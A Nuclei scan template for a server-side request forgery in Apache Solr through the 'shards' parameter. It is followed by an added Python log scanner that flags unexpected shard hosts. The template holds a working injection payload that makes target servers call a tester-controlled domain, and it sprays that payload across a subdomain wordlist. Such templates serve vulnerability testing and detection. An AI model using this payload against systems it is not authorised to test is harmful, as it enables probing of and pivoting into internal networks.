ApacheSolr-SSRF-2.yaml
id: ApacheSolr-SSRF-2
info:
  name: Apache Solr SSRF
  author: 0xAwali
  severity: critical
  description: Apache Solr SSRF Via Shards Parameter , Commonly Bound Ports 8983
  #Add shards Parameter To Any Query e.g. q=search&shards=http://me.com OR q=search%26shards=http://me.com
  reference:
    - https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/#solr
    - https://github.com/veracode-research/solr-injection
requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100
    raw:
      - |
        GET /solr/db/select?q=orange&shards=http://{{Host}}.{{Port}}.{{Subdomains}}.apachesolr.{{MY-DOMAIN}}/solr/atom&qt=/select?fl=id,name:author&wt=json HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.138 Safari/537.36
        Accept: */*
        Accept-Encoding: gzip, deflate
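
A defender-side check for the request shape this template sends, as an added example that is not part of the original template: it scans access-log lines for `shards` parameters, including the `%26shards=` form from the comment above, and reports any shard host outside an allowlist. The allowlist, the log format and the sample lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Assumption: the only hosts this deployment's Solr nodes should fan out to.
ALLOWED_SHARD_HOSTS = {"solr1.internal.example", "solr2.internal.example"}
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def shard_hosts(request_target, extra_decodes=2):
    """Hosts named by any `shards` parameter; the query is re-parsed after each
    extra URL-decode so that q=search%26shards=... is still found."""
    query = urlsplit(request_target).query
    hosts = set()
    for _ in range(extra_decodes + 1):
        for name, value in parse_qsl(query, keep_blank_values=True):
            if name != "shards":
                continue
            # Solr separates shards with ',' and replicas of one shard with '|'.
            for entry in filter(None, re.split(r"[,|]", value)):
                if "://" not in entry:
                    entry = "//" + entry  # the scheme is optional in shards
                try:
                    host = urlsplit(entry).hostname
                except ValueError:
                    host = None
                hosts.add(host or "<unparseable>")
        query = unquote(query)
    return hosts

def suspicious_requests(log_lines):
    """Return (request_target, unexpected_hosts) for each flagged log line."""
    findings = []
    for line in log_lines:
        match = REQUEST_RE.search(line)
        if match:
            unexpected = shard_hosts(match.group(1)) - ALLOWED_SHARD_HOSTS
            if unexpected:
                findings.append((match.group(1), sorted(unexpected)))
    return findings

# Constructed access-log lines (not real traffic).
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /solr/db/select?q=orange&wt=json HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:01 +0000] "GET /solr/db/select?q=orange&shards=http://canary.example/solr/atom&qt=/select?fl=id,name:author&wt=json HTTP/1.1" 200 87',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /search?q=search%26shards=http://canary.example HTTP/1.1" 200 90',
    '10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /solr/db/select?q=*:*&shards=solr1.internal.example:8983/solr/db,solr2.internal.example:8983/solr/db HTTP/1.1" 200 640',
]

if __name__ == "__main__":
    for target, hosts in suspicious_requests(SAMPLE_LOG):
        print(hosts, target)
```

The same allowlist decision is best enforced in front of Solr as well, so that a `shards` value naming an unexpected host is rejected before the node issues the outbound request.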